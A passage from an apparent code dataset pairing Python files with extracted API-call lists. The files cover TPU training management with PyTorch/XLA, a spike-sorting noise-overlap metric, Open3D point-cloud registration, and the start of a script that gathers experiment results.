False, 'from ml import np\n')] |
import ctypes
import threading
from functools import partial
from contextlib import nullcontext
from copy import deepcopy
import multiprocessing as mp
from itertools import zip_longest
from typing import Iterable
import torch
import torch.nn as nn
import torch.utils.data
import torch_xla.core.xla_model as xm
import torch_xla.distributed.xla_multiprocessing as xmp
import torch_xla.distributed.parallel_loader as pl
from hivemind.utils.logging import get_logger
logger = get_logger(__name__)
class TPUManager(mp.Process):
"""Auxiliary class that manages model training over an array of TPU cores"""
def __init__(self,
model,
dataset,
*,
collate_fn: callable = None,
nprocs: int = 8,
prefetch: int = 16,
batch_size_per_device: int = 1,
grad_accumulation_steps: int = 1,
seed_base: int = 42,
start: bool):
super().__init__()
self.lock = mp.Lock()
self.nprocs, self.prefetch, self.seed_base = nprocs, prefetch, seed_base
self.batch_size_per_device, self.grad_accumulation_steps = batch_size_per_device, grad_accumulation_steps
self.collate_fn = collate_fn
self.step_triggered, self.step_finished = mp.Event(), mp.Event()
self._synchronizer = TPUSynchronizer(model)
self._data_manager = TPUDataManager(dataset, nprocs, prefetch)
# shared fields for communicating statistics after each step
self.should_load_parameters = mp.Value(ctypes.c_bool, False)
self.gradients_accumulated = mp.Value(ctypes.c_long, 0)
self.loss_accumulated = mp.Value(ctypes.c_double, 0)
if start:
self.start()
def run(self):
thread = threading.Thread(
target=partial(xmp.spawn, self.runner, nprocs=self.nprocs, start_method='fork'),
daemon=True)
thread.start()
thread.join()
def update_model_parameters(self, new_host_parameters):
"""Schedule TPUs to update model parameters during at the beginning of the next step"""
with self.lock, torch.no_grad():
self._synchronizer.set_host_parameters(new_host_parameters)
self.should_load_parameters.value = True
def get_aggregated_gradients(self):
"""Get current accumulated gradients from the master model"""
with self.lock, torch.no_grad():
return self._synchronizer.get_aggregated_gradients()
def zero_grad(self):
"""Reset master accumulated gradients to zeros"""
with self.lock, torch.no_grad():
for param in self._synchronizer.master_model.parameters():
param.grad.zero_()
def step(self):
"""run forward/backward step with all TPUs, collect gradients"""
self.loss_accumulated.value = self.gradients_accumulated.value = 0
self.step_finished.clear()
self.step_triggered.set()
self.step_finished.wait()
return self.loss_accumulated.value, self.gradients_accumulated.value
def runner(self, tpu_index):
"""Run training steps from the perspective of a single TPU core"""
# acquire the (unique) Cloud TPU core corresponding to this process's index
device = xm.xla_device()
logger.info(f"Process {tpu_index} is using {xm.xla_real_devices([str(device)])[0]}")
# set random seed for
torch.manual_seed(self.seed_base + tpu_index)
# use staged init to minimize peak RAM usage
for init_index in range(xm.xrt_world_size()):
xm.rendezvous(f'init_{init_index}')
if tpu_index == init_index:
model = self._synchronizer.get_device_model_replica(device)
data_loader = self._data_manager.get_device_dataloader(
batch_size=self.batch_size_per_device, num_workers=0, collate_fn=self.collate_fn, pin_memory=False)
data_loader_iter = iter(data_loader)
logger.info(f"Process {tpu_index} initialized.")
xm.rendezvous('init_finished')
while True:
self.step_triggered.wait()
xm.rendezvous('before_step')
if xm.is_master_ordinal():
self.step_triggered.clear()
if bool(self.should_load_parameters.value):
with self.lock if xm.is_master_ordinal() else nullcontext():
self._synchronizer.send_params_to_device(model)
self.should_load_parameters.value = False
### compute loss and gradients
loss = 0.0
for i in range(self.grad_accumulation_steps):
inputs = next(data_loader_iter)
outputs = model(**inputs)
loss_i = outputs["loss"] if isinstance(outputs, dict) else outputs[0]
loss_i = loss_i / (self.grad_accumulation_steps * self.nprocs)
loss_i.backward()
loss += loss_i
del inputs, outputs, loss_i
### aggregate gradients from TPUs
with self.lock if xm.is_master_ordinal() else nullcontext():
self._synchronizer.aggregate_grads_on_host(model, add=True)
# clear aggregated gradients from all devices
model.zero_grad()
### accumulate statistics to host
loss = xm.all_reduce(xm.REDUCE_SUM, loss, scale=1.0)
xm.do_on_ordinals(self._mark_step_finished, data=(loss,), ordinals=(0,))
def _mark_step_finished(self, loss):
self.gradients_accumulated.value = self.batch_size_per_device * self.nprocs * self.grad_accumulation_steps
self.loss_accumulated.value = float(loss)
self.step_finished.set()
class TPUSynchronizer:
"""An auxiliary class for manipulating parameters and gradients without producing a ton of XLA graphs"""
def __init__(self, model: nn.Module):
self.master_model = model.share_memory()
for param in self.master_model.parameters():
if param.grad is None:
param.grad = torch.zeros_like(param)
param.grad = param.grad.share_memory_()
def get_device_model_replica(self, device: torch.device, tie_weights: bool = True):
replica = deepcopy(self.master_model).to(device)
if tie_weights:
replica.tie_weights()
for param in replica.parameters():
param.grad = torch.zeros_like(param, device=device)
return replica
def set_host_parameters(self, new_host_parameters):
return self._assign(source=self.master_model.parameters(), target=new_host_parameters, add=False, strict=True)
def get_aggregated_gradients(self):
return [param.grad for param in self.master_model.parameters()]
def send_params_to_device(self, replica: nn.Module):
"""Copy params from master_model to this device_model replica"""
with torch.no_grad():
replica_params = list(replica.parameters())
master_params = list(self.master_model.parameters())
master_params = xm.send_cpu_data_to_device(master_params, xm.xla_device())
self._assign(source=master_params, target=replica_params, add=False)
xm.rendezvous("params_replicated")
def aggregate_grads_on_host(self, replica: nn.Module, *, add: bool):
"""Aggregate grads from all tpu devices and move them to host"""
with torch.no_grad():
replica_grads = [param.grad for param in replica.parameters()]
replica_grads = xm.all_reduce(xm.REDUCE_SUM, replica_grads, scale=1.0)
master_grads = [hp.grad for hp in self.master_model.parameters()]
xm.do_on_ordinals(lambda *replica_grads: self._assign(source=replica_grads, target=master_grads, add=add),
data=tuple(replica_grads), ordinals=(0,))
# ^-- do_on_ordinals already runs rendezvous at the end
def _assign(self, source: Iterable[torch.Tensor], target: Iterable[torch.Tensor], add: bool, strict: bool = False):
for source_tensor, target_tensor in zip_longest(source, target):
assert source_tensor is not None or target_tensor is not None, "Source and target length must match exactly"
if strict:
assert source_tensor.shape == target_tensor.shape
assert source_tensor.device == target_tensor.device
assert source_tensor.dtype == target_tensor.dtype
if add:
target_tensor.add_(source_tensor)
else:
target_tensor.copy_(source_tensor)
class TPUDataManager:
"""An auxiliary class that loads centralized dataset from master into multiple TPU devices"""
def __init__(self, dataset: torch.utils.data.Dataset, nprocs: int, master_prefetch: int = 16):
self.dataset, self.nprocs = dataset, nprocs
self.device_queues = [mp.Queue(master_prefetch) for _ in range(nprocs)]
self._loader_thread = threading.Thread(target=self._load_data_into_queues)
self._loader_thread.start()
def _load_data_into_queues(self):
try:
for i, batch in enumerate(self.dataset):
self.device_queues[i % self.nprocs].put(batch)
finally:
logger.warning("Minibatch generator finished.")
def get_device_dataloader(self, **kwargs):
data_loader = torch.utils.data.DataLoader(QueueDataset(self.device_queues[xm.get_ordinal()]), **kwargs)
return pl.ParallelLoader(data_loader, [xm.xla_device()]).per_device_loader(xm.xla_device())
class QueueDataset(torch.utils.data.IterableDataset):
"""A dataset that ceaselessly iterates over a queue"""
def __init__(self, queue: mp.Queue):
super().__init__()
self.queue = queue
def __iter__(self):
while True:
yield self.queue.get()
def __len__(self):
return 10 ** 12 # TODO deprecate this when the issue is resolved: https://github.com/googlecolab/colabtools/issues/2237
| [
"torch_xla.core.xla_model.do_on_ordinals",
"torch_xla.core.xla_model.xla_device",
"copy.deepcopy",
"torch_xla.core.xla_model.all_reduce",
"torch_xla.core.xla_model.is_master_ordinal",
"hivemind.utils.logging.get_logger",
"multiprocessing.Value",
"torch.zeros_like",
"multiprocessing.Event",
"iterto... | [((476, 496), 'hivemind.utils.logging.get_logger', 'get_logger', (['__name__'], {}), '(__name__)\n', (486, 496), False, 'from hivemind.utils.logging import get_logger\n'), ((1037, 1046), 'multiprocessing.Lock', 'mp.Lock', ([], {}), '()\n', (1044, 1046), True, 'import multiprocessing as mp\n'), ((1583, 1613), 'multiprocessing.Value', 'mp.Value', (['ctypes.c_bool', '(False)'], {}), '(ctypes.c_bool, False)\n', (1591, 1613), True, 'import multiprocessing as mp\n'), ((1651, 1677), 'multiprocessing.Value', 'mp.Value', (['ctypes.c_long', '(0)'], {}), '(ctypes.c_long, 0)\n', (1659, 1677), True, 'import multiprocessing as mp\n'), ((1710, 1738), 'multiprocessing.Value', 'mp.Value', (['ctypes.c_double', '(0)'], {}), '(ctypes.c_double, 0)\n', (1718, 1738), True, 'import multiprocessing as mp\n'), ((3330, 3345), 'torch_xla.core.xla_model.xla_device', 'xm.xla_device', ([], {}), '()\n', (3343, 3345), True, 'import torch_xla.core.xla_model as xm\n'), ((3478, 3523), 'torch.manual_seed', 'torch.manual_seed', (['(self.seed_base + tpu_index)'], {}), '(self.seed_base + tpu_index)\n', (3495, 3523), False, 'import torch\n'), ((4115, 4145), 'torch_xla.core.xla_model.rendezvous', 'xm.rendezvous', (['"""init_finished"""'], {}), "('init_finished')\n", (4128, 4145), True, 'import torch_xla.core.xla_model as xm\n'), ((8180, 8207), 'itertools.zip_longest', 'zip_longest', (['source', 'target'], {}), '(source, target)\n', (8191, 8207), False, 'from itertools import zip_longest\n'), ((9075, 9127), 'threading.Thread', 'threading.Thread', ([], {'target': 'self._load_data_into_queues'}), '(target=self._load_data_into_queues)\n', (9091, 9127), False, 'import threading\n'), ((1329, 1339), 'multiprocessing.Event', 'mp.Event', ([], {}), '()\n', (1337, 1339), True, 'import multiprocessing as mp\n'), ((1341, 1351), 'multiprocessing.Event', 'mp.Event', ([], {}), '()\n', (1349, 1351), True, 'import multiprocessing as mp\n'), ((2181, 2196), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (2194, 2196), False, 'import torch\n'), ((2458, 2473), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (2471, 2473), False, 'import torch\n'), ((2648, 2663), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (2661, 2663), False, 'import torch\n'), ((3610, 3629), 'torch_xla.core.xla_model.xrt_world_size', 'xm.xrt_world_size', ([], {}), '()\n', (3627, 3629), True, 'import torch_xla.core.xla_model as xm\n'), ((3644, 3679), 'torch_xla.core.xla_model.rendezvous', 'xm.rendezvous', (['f"""init_{init_index}"""'], {}), "(f'init_{init_index}')\n", (3657, 3679), True, 'import torch_xla.core.xla_model as xm\n'), ((4218, 4246), 'torch_xla.core.xla_model.rendezvous', 'xm.rendezvous', (['"""before_step"""'], {}), "('before_step')\n", (4231, 4246), True, 'import torch_xla.core.xla_model as xm\n'), ((4262, 4284), 'torch_xla.core.xla_model.is_master_ordinal', 'xm.is_master_ordinal', ([], {}), '()\n', (4282, 4284), True, 'import torch_xla.core.xla_model as xm\n'), ((5433, 5478), 'torch_xla.core.xla_model.all_reduce', 'xm.all_reduce', (['xm.REDUCE_SUM', 'loss'], {'scale': '(1.0)'}), '(xm.REDUCE_SUM, loss, scale=1.0)\n', (5446, 5478), True, 'import torch_xla.core.xla_model as xm\n'), ((5491, 5563), 'torch_xla.core.xla_model.do_on_ordinals', 'xm.do_on_ordinals', (['self._mark_step_finished'], {'data': '(loss,)', 'ordinals': '(0,)'}), '(self._mark_step_finished, data=(loss,), ordinals=(0,))\n', (5508, 5563), True, 'import torch_xla.core.xla_model as xm\n'), ((6495, 6533), 'torch.zeros_like', 'torch.zeros_like', (['param'], {'device': 'device'}), '(param, device=device)\n', (6511, 6533), False, 'import torch\n'), ((6990, 7005), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (7003, 7005), False, 'import torch\n'), ((7308, 7342), 'torch_xla.core.xla_model.rendezvous', 'xm.rendezvous', (['"""params_replicated"""'], {}), "('params_replicated')\n", (7321, 7342), True, 'import torch_xla.core.xla_model as xm\n'), ((7503, 7518), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (7516, 7518), False, 'import torch\n'), ((7623, 7677), 'torch_xla.core.xla_model.all_reduce', 'xm.all_reduce', (['xm.REDUCE_SUM', 'replica_grads'], {'scale': '(1.0)'}), '(xm.REDUCE_SUM, replica_grads, scale=1.0)\n', (7636, 7677), True, 'import torch_xla.core.xla_model as xm\n'), ((8995, 9020), 'multiprocessing.Queue', 'mp.Queue', (['master_prefetch'], {}), '(master_prefetch)\n', (9003, 9020), True, 'import multiprocessing as mp\n'), ((9652, 9667), 'torch_xla.core.xla_model.xla_device', 'xm.xla_device', ([], {}), '()\n', (9665, 9667), True, 'import torch_xla.core.xla_model as xm\n'), ((1856, 1928), 'functools.partial', 'partial', (['xmp.spawn', 'self.runner'], {'nprocs': 'self.nprocs', 'start_method': '"""fork"""'}), "(xmp.spawn, self.runner, nprocs=self.nprocs, start_method='fork')\n", (1863, 1928), False, 'from functools import partial\n'), ((6147, 6170), 'torch.zeros_like', 'torch.zeros_like', (['param'], {}), '(param)\n', (6163, 6170), False, 'import torch\n'), ((6330, 6357), 'copy.deepcopy', 'deepcopy', (['self.master_model'], {}), '(self.master_model)\n', (6338, 6357), False, 'from copy import deepcopy\n'), ((7198, 7213), 'torch_xla.core.xla_model.xla_device', 'xm.xla_device', ([], {}), '()\n', (7211, 7213), True, 'import torch_xla.core.xla_model as xm\n'), ((5160, 5182), 'torch_xla.core.xla_model.is_master_ordinal', 'xm.is_master_ordinal', ([], {}), '()\n', (5180, 5182), True, 'import torch_xla.core.xla_model as xm\n'), ((5188, 5201), 'contextlib.nullcontext', 'nullcontext', ([], {}), '()\n', (5199, 5201), False, 'from contextlib import nullcontext\n'), ((9539, 9555), 'torch_xla.core.xla_model.get_ordinal', 'xm.get_ordinal', ([], {}), '()\n', (9553, 9555), True, 'import torch_xla.core.xla_model as xm\n'), ((4421, 4443), 'torch_xla.core.xla_model.is_master_ordinal', 'xm.is_master_ordinal', ([], {}), '()\n', (4441, 4443), True, 'import torch_xla.core.xla_model as xm\n'), ((4449, 4462), 'contextlib.nullcontext', 'nullcontext', ([], {}), '()\n', (4460, 4462), False, 'from contextlib import nullcontext\n'), ((9616, 9631), 'torch_xla.core.xla_model.xla_device', 'xm.xla_device', ([], {}), '()\n', (9629, 9631), True, 'import torch_xla.core.xla_model as xm\n')] |
import numpy as np
from copy import copy
from .utils.thresholdcurator import ThresholdCurator
from .quality_metric import QualityMetric
import spiketoolkit as st
import spikemetrics.metrics as metrics
from spikemetrics.utils import printProgressBar
from collections import OrderedDict
from sklearn.neighbors import NearestNeighbors
from .parameter_dictionaries import update_all_param_dicts_with_kwargs
class NoiseOverlap(QualityMetric):
installed = True # check at class level if installed or not
installation_mesg = "" # err
params = OrderedDict([('max_spikes_per_unit_for_noise_overlap', 1000), ('num_features', 10),
('num_knn', 6)])
curator_name = "ThresholdNoiseOverlaps"
def __init__(self, metric_data):
QualityMetric.__init__(self, metric_data, metric_name="noise_overlap")
if not metric_data.has_recording():
raise ValueError("MetricData object must have a recording")
def compute_metric(self, max_spikes_per_unit_for_noise_overlap, num_features, num_knn, **kwargs):
params_dict = update_all_param_dicts_with_kwargs(kwargs)
save_property_or_features = params_dict['save_property_or_features']
seed = params_dict['seed']
waveforms = st.postprocessing.get_unit_waveforms(
self._metric_data._recording,
self._metric_data._sorting,
unit_ids=self._metric_data._unit_ids,
max_spikes_per_unit=max_spikes_per_unit_for_noise_overlap,
**kwargs
)
if seed is not None:
np.random.seed(seed)
noise_overlaps = []
for i_u, unit in enumerate(self._metric_data._unit_ids):
if self._metric_data.verbose:
printProgressBar(i_u + 1, len(self._metric_data._unit_ids))
wfs = waveforms[i_u]
times = self._metric_data._sorting.get_unit_spike_train(unit_id=unit)
if len(wfs) > max_spikes_per_unit_for_noise_overlap:
selecte_idxs = np.random.choice(times, size=max_spikes_per_unit_for_noise_overlap)
wfs = wfs[selecte_idxs]
# get clip_size from waveforms shape
clip_size = wfs.shape[-1]
num_clips = len(wfs)
min_time = np.min(times)
max_time = np.max(times)
times_control = np.random.choice(np.arange(min_time, max_time), size=num_clips)
clips = copy(wfs)
clips_control = np.stack(self._metric_data._recording.get_snippets(snippet_len=clip_size,
reference_frames=times_control))
template = np.median(wfs, axis=0)
max_ind = np.unravel_index(np.argmax(np.abs(template)), template.shape)
chmax = max_ind[0]
tmax = max_ind[1]
max_val = template[chmax, tmax]
weighted_clips_control = np.zeros(clips_control.shape)
weights = np.zeros(num_clips)
for j in range(num_clips):
clip0 = clips_control[j, :, :]
val0 = clip0[chmax, tmax]
weight0 = val0 * max_val
weights[j] = weight0
weighted_clips_control[j, :, :] = clip0 * weight0
noise_template = np.sum(weighted_clips_control, axis=0)
noise_template = noise_template / np.sum(np.abs(noise_template)) * np.sum(np.abs(template))
for j in range(num_clips):
clips[j, :, :] = _subtract_clip_component(clips[j, :, :], noise_template)
clips_control[j, :, :] = _subtract_clip_component(clips_control[j, :, :], noise_template)
all_clips = np.concatenate([clips, clips_control], axis=0)
num_channels_wfs = all_clips.shape[1]
num_samples_wfs = all_clips.shape[2]
all_features = _compute_pca_features(all_clips.reshape((num_clips * 2,
num_channels_wfs * num_samples_wfs)), num_features)
num_all_clips=len(all_clips)
distances, indices = NearestNeighbors(n_neighbors=min(num_knn + 1, num_all_clips - 1), algorithm='auto').fit(
all_features.T).kneighbors()
group_id = np.zeros((num_clips * 2))
group_id[0:num_clips] = 1
group_id[num_clips:] = 2
num_match = 0
total = 0
for j in range(num_clips * 2):
for k in range(1, min(num_knn + 1, num_all_clips - 1)):
ind = indices[j][k]
if group_id[j] == group_id[ind]:
num_match = num_match + 1
total = total + 1
pct_match = num_match / total
noise_overlap = 1 - pct_match
noise_overlaps.append(noise_overlap)
noise_overlaps = np.asarray(noise_overlaps)
if save_property_or_features:
self.save_property_or_features(self._metric_data._sorting, noise_overlaps, self._metric_name)
return noise_overlaps
def threshold_metric(self, threshold, threshold_sign, max_spikes_per_unit_for_noise_overlap,
num_features, num_knn, **kwargs):
noise_overlaps = self.compute_metric(max_spikes_per_unit_for_noise_overlap, num_features, num_knn, **kwargs)
threshold_curator = ThresholdCurator(sorting=self._metric_data._sorting, metric=noise_overlaps)
threshold_curator.threshold_sorting(threshold=threshold, threshold_sign=threshold_sign)
return threshold_curator
def _compute_pca_features(X, num_components):
u, s, vt = np.linalg.svd(X)
return u[:, :num_components].T
def _subtract_clip_component(clip1, component):
V1 = clip1.flatten()
V2 = component.flatten()
V1 = V1 - np.mean(V1)
V2 = V2 - np.mean(V2)
V1 = V1 - V2 * np.dot(V1, V2) / np.dot(V2, V2)
return V1.reshape(clip1.shape)
| [
"numpy.mean",
"collections.OrderedDict",
"spiketoolkit.postprocessing.get_unit_waveforms",
"numpy.median",
"numpy.abs",
"numpy.random.choice",
"numpy.asarray",
"numpy.max",
"numpy.sum",
"numpy.zeros",
"numpy.dot",
"numpy.random.seed",
"numpy.concatenate",
"numpy.min",
"numpy.linalg.svd",... | [((552, 657), 'collections.OrderedDict', 'OrderedDict', (["[('max_spikes_per_unit_for_noise_overlap', 1000), ('num_features', 10), (\n 'num_knn', 6)]"], {}), "([('max_spikes_per_unit_for_noise_overlap', 1000), (\n 'num_features', 10), ('num_knn', 6)])\n", (563, 657), False, 'from collections import OrderedDict\n'), ((5662, 5678), 'numpy.linalg.svd', 'np.linalg.svd', (['X'], {}), '(X)\n', (5675, 5678), True, 'import numpy as np\n'), ((1258, 1468), 'spiketoolkit.postprocessing.get_unit_waveforms', 'st.postprocessing.get_unit_waveforms', (['self._metric_data._recording', 'self._metric_data._sorting'], {'unit_ids': 'self._metric_data._unit_ids', 'max_spikes_per_unit': 'max_spikes_per_unit_for_noise_overlap'}), '(self._metric_data._recording, self.\n _metric_data._sorting, unit_ids=self._metric_data._unit_ids,\n max_spikes_per_unit=max_spikes_per_unit_for_noise_overlap, **kwargs)\n', (1294, 1468), True, 'import spiketoolkit as st\n'), ((4891, 4917), 'numpy.asarray', 'np.asarray', (['noise_overlaps'], {}), '(noise_overlaps)\n', (4901, 4917), True, 'import numpy as np\n'), ((5832, 5843), 'numpy.mean', 'np.mean', (['V1'], {}), '(V1)\n', (5839, 5843), True, 'import numpy as np\n'), ((5858, 5869), 'numpy.mean', 'np.mean', (['V2'], {}), '(V2)\n', (5865, 5869), True, 'import numpy as np\n'), ((1572, 1592), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (1586, 1592), True, 'import numpy as np\n'), ((2270, 2283), 'numpy.min', 'np.min', (['times'], {}), '(times)\n', (2276, 2283), True, 'import numpy as np\n'), ((2307, 2320), 'numpy.max', 'np.max', (['times'], {}), '(times)\n', (2313, 2320), True, 'import numpy as np\n'), ((2433, 2442), 'copy.copy', 'copy', (['wfs'], {}), '(wfs)\n', (2437, 2442), False, 'from copy import copy\n'), ((2680, 2702), 'numpy.median', 'np.median', (['wfs'], {'axis': '(0)'}), '(wfs, axis=0)\n', (2689, 2702), True, 'import numpy as np\n'), ((2929, 2958), 'numpy.zeros', 'np.zeros', (['clips_control.shape'], {}), '(clips_control.shape)\n', (2937, 2958), True, 'import numpy as np\n'), ((2981, 3000), 'numpy.zeros', 'np.zeros', (['num_clips'], {}), '(num_clips)\n', (2989, 3000), True, 'import numpy as np\n'), ((3303, 3341), 'numpy.sum', 'np.sum', (['weighted_clips_control'], {'axis': '(0)'}), '(weighted_clips_control, axis=0)\n', (3309, 3341), True, 'import numpy as np\n'), ((3707, 3753), 'numpy.concatenate', 'np.concatenate', (['[clips, clips_control]'], {'axis': '(0)'}), '([clips, clips_control], axis=0)\n', (3721, 3753), True, 'import numpy as np\n'), ((4288, 4311), 'numpy.zeros', 'np.zeros', (['(num_clips * 2)'], {}), '(num_clips * 2)\n', (4296, 4311), True, 'import numpy as np\n'), ((5906, 5920), 'numpy.dot', 'np.dot', (['V2', 'V2'], {}), '(V2, V2)\n', (5912, 5920), True, 'import numpy as np\n'), ((2017, 2084), 'numpy.random.choice', 'np.random.choice', (['times'], {'size': 'max_spikes_per_unit_for_noise_overlap'}), '(times, size=max_spikes_per_unit_for_noise_overlap)\n', (2033, 2084), True, 'import numpy as np\n'), ((2366, 2395), 'numpy.arange', 'np.arange', (['min_time', 'max_time'], {}), '(min_time, max_time)\n', (2375, 2395), True, 'import numpy as np\n'), ((5889, 5903), 'numpy.dot', 'np.dot', (['V1', 'V2'], {}), '(V1, V2)\n', (5895, 5903), True, 'import numpy as np\n'), ((2752, 2768), 'numpy.abs', 'np.abs', (['template'], {}), '(template)\n', (2758, 2768), True, 'import numpy as np\n'), ((3428, 3444), 'numpy.abs', 'np.abs', (['template'], {}), '(template)\n', (3434, 3444), True, 'import numpy as np\n'), ((3395, 3417), 'numpy.abs', 'np.abs', (['noise_template'], {}), '(noise_template)\n', (3401, 3417), True, 'import numpy as np\n')] |
# Open3D: www.open3d.org
# The MIT License (MIT)
# See license file or visit www.open3d.org for details
# examples/Python/Advanced/global_registration.py
import open3d as o3d
import numpy as np
import copy
def draw_registration_result(source, target, transformation):
source_temp = copy.deepcopy(source)
target_temp = copy.deepcopy(target)
source_temp.paint_uniform_color([1, 0.706, 0])
target_temp.paint_uniform_color([0, 0.651, 0.929])
source_temp.transform(transformation)
o3d.visualization.draw_geometries([source_temp, target_temp])
def preprocess_point_cloud(pcd, voxel_size):
print(":: Downsample with a voxel size %.3f." % voxel_size)
pcd_down = pcd.voxel_down_sample(voxel_size)
radius_normal = voxel_size * 2
print(":: Estimate normal with search radius %.3f." % radius_normal)
pcd_down.estimate_normals(
o3d.geometry.KDTreeSearchParamHybrid(radius=radius_normal, max_nn=30))
radius_feature = voxel_size * 5
print(":: Compute FPFH feature with search radius %.3f." % radius_feature)
pcd_fpfh = o3d.registration.compute_fpfh_feature(
pcd_down,
o3d.geometry.KDTreeSearchParamHybrid(radius=radius_feature, max_nn=100))
return pcd_down, pcd_fpfh
def prepare_dataset(voxel_size):
print(":: Load two point clouds and disturb initial pose.")
source = o3d.io.read_point_cloud("../../TestData/ICP/cloud_bin_0.pcd")
target = o3d.io.read_point_cloud("../../TestData/ICP/cloud_bin_1.pcd")
trans_init = np.asarray([[0.0, 0.0, 1.0, 0.0], [1.0, 0.0, 0.0, 0.0],
[0.0, 1.0, 0.0, 0.0], [0.0, 0.0, 0.0, 1.0]])
source.transform(trans_init)
draw_registration_result(source, target, np.identity(4))
source_down, source_fpfh = preprocess_point_cloud(source, voxel_size)
target_down, target_fpfh = preprocess_point_cloud(target, voxel_size)
return source, target, source_down, target_down, source_fpfh, target_fpfh
def execute_global_registration(source_down, target_down, source_fpfh,
target_fpfh, voxel_size):
distance_threshold = voxel_size * 1.5
print(":: RANSAC registration on downsampled point clouds.")
print(" Since the downsampling voxel size is %.3f," % voxel_size)
print(" we use a liberal distance threshold %.3f." % distance_threshold)
result = o3d.registration.registration_ransac_based_on_feature_matching(
source_down, target_down, source_fpfh, target_fpfh, distance_threshold,
o3d.registration.TransformationEstimationPointToPoint(False), 4, [
o3d.registration.CorrespondenceCheckerBasedOnEdgeLength(0.9),
o3d.registration.CorrespondenceCheckerBasedOnDistance(
distance_threshold)
], o3d.registration.RANSACConvergenceCriteria(4000000, 500))
return result
def refine_registration(source, target, source_fpfh, target_fpfh, voxel_size):
distance_threshold = voxel_size * 0.4
print(":: Point-to-plane ICP registration is applied on original point")
print(" clouds to refine the alignment. This time we use a strict")
print(" distance threshold %.3f." % distance_threshold)
result = o3d.registration.registration_icp(
source, target, distance_threshold, result_ransac.transformation,
o3d.registration.TransformationEstimationPointToPlane())
return result
if __name__ == "__main__":
voxel_size = 0.05 # means 5cm for the dataset
source, target, source_down, target_down, source_fpfh, target_fpfh = \
prepare_dataset(voxel_size)
result_ransac = execute_global_registration(source_down, target_down,
source_fpfh, target_fpfh,
voxel_size)
print(result_ransac)
draw_registration_result(source_down, target_down,
result_ransac.transformation)
result_icp = refine_registration(source, target, source_fpfh, target_fpfh,
voxel_size)
print(result_icp)
draw_registration_result(source, target, result_icp.transformation) | [
"numpy.identity",
"open3d.registration.TransformationEstimationPointToPlane",
"open3d.registration.CorrespondenceCheckerBasedOnEdgeLength",
"numpy.asarray",
"open3d.geometry.KDTreeSearchParamHybrid",
"open3d.registration.RANSACConvergenceCriteria",
"open3d.visualization.draw_geometries",
"open3d.io.re... | [((290, 311), 'copy.deepcopy', 'copy.deepcopy', (['source'], {}), '(source)\n', (303, 311), False, 'import copy\n'), ((330, 351), 'copy.deepcopy', 'copy.deepcopy', (['target'], {}), '(target)\n', (343, 351), False, 'import copy\n'), ((504, 565), 'open3d.visualization.draw_geometries', 'o3d.visualization.draw_geometries', (['[source_temp, target_temp]'], {}), '([source_temp, target_temp])\n', (537, 565), True, 'import open3d as o3d\n'), ((1356, 1417), 'open3d.io.read_point_cloud', 'o3d.io.read_point_cloud', (['"""../../TestData/ICP/cloud_bin_0.pcd"""'], {}), "('../../TestData/ICP/cloud_bin_0.pcd')\n", (1379, 1417), True, 'import open3d as o3d\n'), ((1431, 1492), 'open3d.io.read_point_cloud', 'o3d.io.read_point_cloud', (['"""../../TestData/ICP/cloud_bin_1.pcd"""'], {}), "('../../TestData/ICP/cloud_bin_1.pcd')\n", (1454, 1492), True, 'import open3d as o3d\n'), ((1510, 1615), 'numpy.asarray', 'np.asarray', (['[[0.0, 0.0, 1.0, 0.0], [1.0, 0.0, 0.0, 0.0], [0.0, 1.0, 0.0, 0.0], [0.0, \n 0.0, 0.0, 1.0]]'], {}), '([[0.0, 0.0, 1.0, 0.0], [1.0, 0.0, 0.0, 0.0], [0.0, 1.0, 0.0, 0.0\n ], [0.0, 0.0, 0.0, 1.0]])\n', (1520, 1615), True, 'import numpy as np\n'), ((874, 943), 'open3d.geometry.KDTreeSearchParamHybrid', 'o3d.geometry.KDTreeSearchParamHybrid', ([], {'radius': 'radius_normal', 'max_nn': '(30)'}), '(radius=radius_normal, max_nn=30)\n', (910, 943), True, 'import open3d as o3d\n'), ((1141, 1212), 'open3d.geometry.KDTreeSearchParamHybrid', 'o3d.geometry.KDTreeSearchParamHybrid', ([], {'radius': 'radius_feature', 'max_nn': '(100)'}), '(radius=radius_feature, max_nn=100)\n', (1177, 1212), True, 'import open3d as o3d\n'), ((1718, 1732), 'numpy.identity', 'np.identity', (['(4)'], {}), '(4)\n', (1729, 1732), True, 'import numpy as np\n'), ((2515, 2575), 'open3d.registration.TransformationEstimationPointToPoint', 'o3d.registration.TransformationEstimationPointToPoint', (['(False)'], {}), '(False)\n', (2568, 2575), True, 'import open3d as o3d\n'), ((2770, 2826), 'open3d.registration.RANSACConvergenceCriteria', 'o3d.registration.RANSACConvergenceCriteria', (['(4000000)', '(500)'], {}), '(4000000, 500)\n', (2812, 2826), True, 'import open3d as o3d\n'), ((3312, 3367), 'open3d.registration.TransformationEstimationPointToPlane', 'o3d.registration.TransformationEstimationPointToPlane', ([], {}), '()\n', (3365, 3367), True, 'import open3d as o3d\n'), ((2594, 2654), 'open3d.registration.CorrespondenceCheckerBasedOnEdgeLength', 'o3d.registration.CorrespondenceCheckerBasedOnEdgeLength', (['(0.9)'], {}), '(0.9)\n', (2649, 2654), True, 'import open3d as o3d\n'), ((2668, 2741), 'open3d.registration.CorrespondenceCheckerBasedOnDistance', 'o3d.registration.CorrespondenceCheckerBasedOnDistance', (['distance_threshold'], {}), '(distance_threshold)\n', (2721, 2741), True, 'import open3d as o3d\n')] |
import os
import argparse
import pandas as pd
import numpy as np
from sklearn.metrics import f1_score, r2_score
from tqdm import tqdm
parser = argparse.ArgumentParser()
parser.add_argument("--exp_dir", type=str, help="path to directory containing test results",
default="/scratch/wdjo224/deep_protein_binding/experiments")
parser.add_argument("--exp_name", type=str, help="name of the experiment to collect results", default="binding_debug")
parser.add_argument("--exp_type", type=str, help="indicate regression (reg) or classification (class)",
default="class")
parser.add_argument("--exp_epoch", type=int, help="which epoch to get results for", default=4)
args = parser.parse_args()
test_dict = {"path": [], "score": []}
test_list = []
print("reading test results...")
for root, dirs, files in tqdm(os.walk(args.exp_dir), total=len(os.listdir(args.exp_dir))):
if "test_results" in root and args.exp_name in root and "epoch{}".format(args.exp_epoch) in root:
process = root.split("/")[-1].split("_")[0]
test_df = pd.DataFrame({"idx": [], "pred": [], "true": [], "loss": []})
for file in os.listdir(root):
